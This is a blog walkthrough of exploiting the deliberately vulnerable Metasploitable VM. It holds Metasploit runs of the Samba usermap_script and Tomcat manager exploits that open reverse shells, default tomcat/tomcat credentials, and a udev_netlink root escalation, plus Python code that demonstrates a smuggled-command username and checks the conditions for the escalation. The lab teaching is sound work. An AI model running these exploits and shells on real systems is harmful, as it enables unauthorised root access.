Saturday, November 9, 2013

Metasploitable - Walkthrough

Metasploitable is another intentionally vulnerable VM, built for practising penetration testing and Metasploit in particular. I could have used manual methods as in the previous walkthroughs, but this time I decided to use Metasploit for the exploitation.

I started with an nmap scan as usual (SYN scan with OS and version detection):

root@kali:~# nmap -sS -A 192.168.1.22

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-09 21:28 CET
Nmap scan report for 192.168.1.22
Host is up (0.0022s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45+00:00
|_Not valid after:  2010-04-16T13:07:45+00:00
|_ssl-date: 2013-11-09T20:28:17+00:00; -2s from local time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 8
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: V&Vbg^%8+nhCQQ"PQ%bB
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Apache Tomcat/5.5
MAC Address: 00:0C:29:0E:5C:5B (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP
|_  System time: 2013-11-09T15:28:17-05:00

TRACEROUTE
HOP RTT     ADDRESS
1   2.16 ms 192.168.1.22

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.00 seconds

Since everything is easy with Metasploit, I will show two methods.


Method 1 - Samba

A Google search for "Samba 3.0.20 exploit" leads to the following page:

http://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script

which is exactly the MSF module we need. It targets the "username map script" command-execution flaw (CVE-2007-2447): when smb.conf uses that non-default option, the username sent during session setup is passed to a shell unsanitised, so a username containing shell metacharacters runs arbitrary commands before any authentication happens. The Samba version nmap reported in smb-os-discovery (3.0.20-Debian) is in the affected range (3.0.20 through 3.0.25rc3). Configuring and running MSF:

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.1.22
msf exploit(usermap_script) > set payload cmd/unix/reverse_netcat
msf exploit(usermap_script) > set LHOST 192.168.1.17
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.22     yes       The target address
   RPORT  139              yes       The target port


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.17     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(usermap_script) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Command shell session 1 opened (192.168.1.17:4444 -> 192.168.1.22:59321) at 2013-11-09 21:46:52 +0100

python -c 'import pty;pty.spawn("/bin/bash")'
root@metasploitable:/# id
id
uid=0(root) gid=0(root)
root@metasploitable:/# 

The injected command runs as the smbd process, which on Metasploitable is root, so there is nothing left to escalate and we are done. (The python -c 'import pty;pty.spawn("/bin/bash")' line above just upgrades the raw netcat shell to an interactive pty with a proper prompt.)
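To see why a username is enough to get a root shell here, the following added example (mine, not the page's or Samba's code) simulates what the "username map script" option does with the username: the vulnerable form builds one command string and hands it to /bin/sh, the hardened form passes the username as a single argv element. The map script is replaced by "echo" and the payload inside the backticks by a harmless "echo INJECTED" so it can be run anywhere; both are assumptions standing in for the script on the target and for the reverse shell the module puts in the username.

```python
import subprocess

# Stand-in for the map script configured in smb.conf on the target
# (assumption: "echo" is used here so the simulation runs anywhere
# without side effects).
MAP_SCRIPT = "echo"

# Shell metacharacters that let a username escape the command string.
SHELL_META = set("`$;|&<>(){}\n")


def map_user_vulnerable(username):
    """Samba 3.0.20-3.0.25rc3 style: the script and the unsanitised username
    are joined into one string and handed to /bin/sh -c. Anything inside
    backticks is executed before the script itself ever runs."""
    command_line = f"{MAP_SCRIPT} {username}"
    result = subprocess.run(command_line, shell=True,
                            capture_output=True, text=True)
    return result.stdout.strip()


def map_user_hardened(username):
    """argv form: the username reaches the script as one argument and is
    never parsed by a shell, so metacharacters are just characters."""
    result = subprocess.run([MAP_SCRIPT, username],
                            capture_output=True, text=True)
    return result.stdout.strip()


def suspicious_username(username):
    """Detection-side check: a session-setup username carrying shell
    metacharacters is never legitimate and is worth an alert."""
    return any(c in SHELL_META for c in username)


# Constructed attacker-controlled username: "echo INJECTED" stands in for
# the reverse shell command the Metasploit module places inside backticks.
INJECTED_USER = "guest`echo INJECTED`"

if __name__ == "__main__":
    print("vulnerable :", map_user_vulnerable(INJECTED_USER))   # guestINJECTED
    print("hardened   :", map_user_hardened(INJECTED_USER))     # guest`echo INJECTED`
    print("suspicious :", suspicious_username(INJECTED_USER))   # True
```

Under the vulnerable path the backticked command has already run by the time "echo" sees its argument; under the argv path the backticks arrive as literal text. The same check on the username is what a detection rule on SMB session-setup logs would look for.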


Method 2 - via Tomcat Manager + UDEV Netlink local exploit

There is a Tomcat service on port 8180, and if we browse to it we find the default landing page with links to the manager and admin applications. A quick Google search shows that the default Tomcat manager username and password are tomcat/tomcat. I tried them and they really worked. Now we only need the exploit:

http://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_deploy

The module uploads a WAR containing a JSP stager through the manager's deploy interface, requests the JSP to run it, and then undeploys the application again. Here is the related MSF configuration:

msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  tomcat           no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST     192.168.1.22     yes       The target address
   RPORT     8180             yes       The target port
   USERNAME  tomcat           no        The username to authenticate as
   VHOST                      no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.17     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6462 bytes as Yd0glyiN6vrkhM.war ...
[*] Executing /Yd0glyiN6vrkhM/Ak0iJcrqppzQUwP7xB.jsp...
[*] Undeploying Yd0glyiN6vrkhM ...
[*] Sending stage (30355 bytes) to 192.168.1.22
[*] Meterpreter session 2 opened (192.168.1.17:4444 -> 192.168.1.22:42541) at 2013-11-09 22:06:25 +0100

meterpreter > sysinfo
Computer    : metasploitable
OS          : Linux 2.6.24-16-server (i386)
Meterpreter : java/java
meterpreter > getuid
Server username: tomcat55


As we can see, we are not root yet, only the limited tomcat55 account. Let's put meterpreter in the background ('background' command) and look for a local root exploit.

I picked the udev netlink exploit (CVE-2009-1185): udevd on this release accepts netlink uevent messages from any local process instead of only from the kernel, so an unprivileged user can make it execute a program of their choosing as root.
http://www.rapid7.com/db/modules/exploit/linux/local/udev_netlink

meterpreter > background
[*] Backgrounding session 3...
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/
use exploit/linux/local/hp_smhstart     use exploit/linux/local/sock_sendpage   use exploit/linux/local/zpanel_zsudo
use exploit/linux/local/kloxo_lxsuexec  use exploit/linux/local/udev_netlink   
msf exploit(tomcat_mgr_deploy) > use exploit/linux/local/udev_netlink

msf exploit(udev_netlink) > set SESSION 3
SESSION => 3
msf exploit(udev_netlink) > show options

Module options (exploit/linux/local/udev_netlink):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   NetlinkPID                    no        Usually udevd pid-1.  Meterpreter sessions will autodetect
   SESSION                       yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)


Exploit target:

   Id  Name
   --  ----
   0   Linux x86


msf exploit(udev_netlink) > exploit

[*] Started reverse handler on 192.168.1.17:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2991
[+] Found netlink pid: 2990
[*] Writing payload executable (259 bytes) to /tmp/IQBLahEWgL
[*] Writing exploit executable (1879 bytes) to /tmp/pGynSspMQB
[*] chmod'ing and running it...
[*] Command shell session 4 opened (192.168.1.17:4444 -> 192.168.1.22:48408) at 2013-11-09 22:14:30 +0100

id
uid=0(root) gid=0(root)


...and we are root.
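The module's own output shows the three things that decide whether this escalation will work: a udev release older than 141 (the version that started rejecting uevents not sent by the kernel), the port id of udevd's NETLINK_KOBJECT_UEVENT socket (the module guesses udevd's pid minus one, because udevd binds the socket to its pid before it forks into the background), and a WritableDir that is not mounted noexec. The following added example (mine, not the module's code) performs those three checks from data any unprivileged user can read: /proc/net/netlink and /proc/mounts. The file contents embedded here are constructed samples built to match the pids and options seen on this page, and "udevd 117" is an assumed version string for whatever udev's version command prints on the target.

```python
import re

NETLINK_KOBJECT_UEVENT = 15   # protocol number from <linux/netlink.h>
FIXED_UDEV_VERSION = 141      # udev 141 began checking that uevents come from the kernel

# Constructed sample of /proc/net/netlink: Eth is the netlink protocol,
# Pid the socket's port id (udevd binds its uevent socket to its own pid).
SAMPLE_PROC_NET_NETLINK = """\
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks     Drops    Inode
c7a0d800 0   0      00000000 0        0        00000000 2        0        3
c7a0da00 15  0      00000000 0        0        00000000 2        0        9
c7a0dc00 15  2990   00000001 0        0        00000000 2        0        4567
c7a0de00 16  2600   00000000 0        0        00000000 2        0        5012
"""

# Constructed sample of /proc/mounts with /tmp mounted noexec.
SAMPLE_PROC_MOUNTS = """\
/dev/sda1 / ext3 rw,relatime,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
"""


def uevent_listener_pids(proc_net_netlink_text):
    """Port ids of user-space NETLINK_KOBJECT_UEVENT sockets (Pid 0 is the kernel)."""
    pids = []
    for line in proc_net_netlink_text.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 3 and int(fields[1]) == NETLINK_KOBJECT_UEVENT:
            pid = int(fields[2])
            if pid != 0:
                pids.append(pid)
    return pids


def udev_vulnerable(version_output):
    """True when the udev release number (e.g. 'udevd 117') predates 141."""
    match = re.search(r"\d+", version_output)
    return match is not None and int(match.group()) < FIXED_UDEV_VERSION


def mount_options_for(path, proc_mounts_text):
    """Mount options of the mount holding `path` (longest matching mount point)."""
    best = ("", "")
    for line in proc_mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        mountpoint, options = fields[1], fields[3]
        covers = path == mountpoint or path.startswith(mountpoint.rstrip("/") + "/")
        if covers and len(mountpoint) > len(best[0]):
            best = (mountpoint, options)
    return best[1].split(",")


def writable_dir_usable(path, proc_mounts_text):
    """False when the module would drop its binaries on a noexec mount."""
    return "noexec" not in mount_options_for(path, proc_mounts_text)


def preflight(version_output, proc_net_netlink_text, proc_mounts_text, writable_dir="/tmp"):
    """Everything the udev_netlink module needs to know before it fires."""
    return {
        "udev_vulnerable": udev_vulnerable(version_output),
        "netlink_pids": uevent_listener_pids(proc_net_netlink_text),
        "writable_dir_usable": writable_dir_usable(writable_dir, proc_mounts_text),
    }


if __name__ == "__main__":
    # On the target, read the real /proc files instead of the samples.
    print(preflight("udevd 117", SAMPLE_PROC_NET_NETLINK, SAMPLE_PROC_MOUNTS))
```

Reading the port id from /proc/net/netlink removes the guesswork behind the NetlinkPID option, and the mount check explains the "must not be mounted noexec" note on WritableDir: with /tmp mounted noexec as in the sample, the module's chmod of /tmp/pGynSspMQB would succeed but the execution would not, and /var/tmp or another writable directory on an exec mount should be set instead.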

There are more methods, but I will leave them to you.
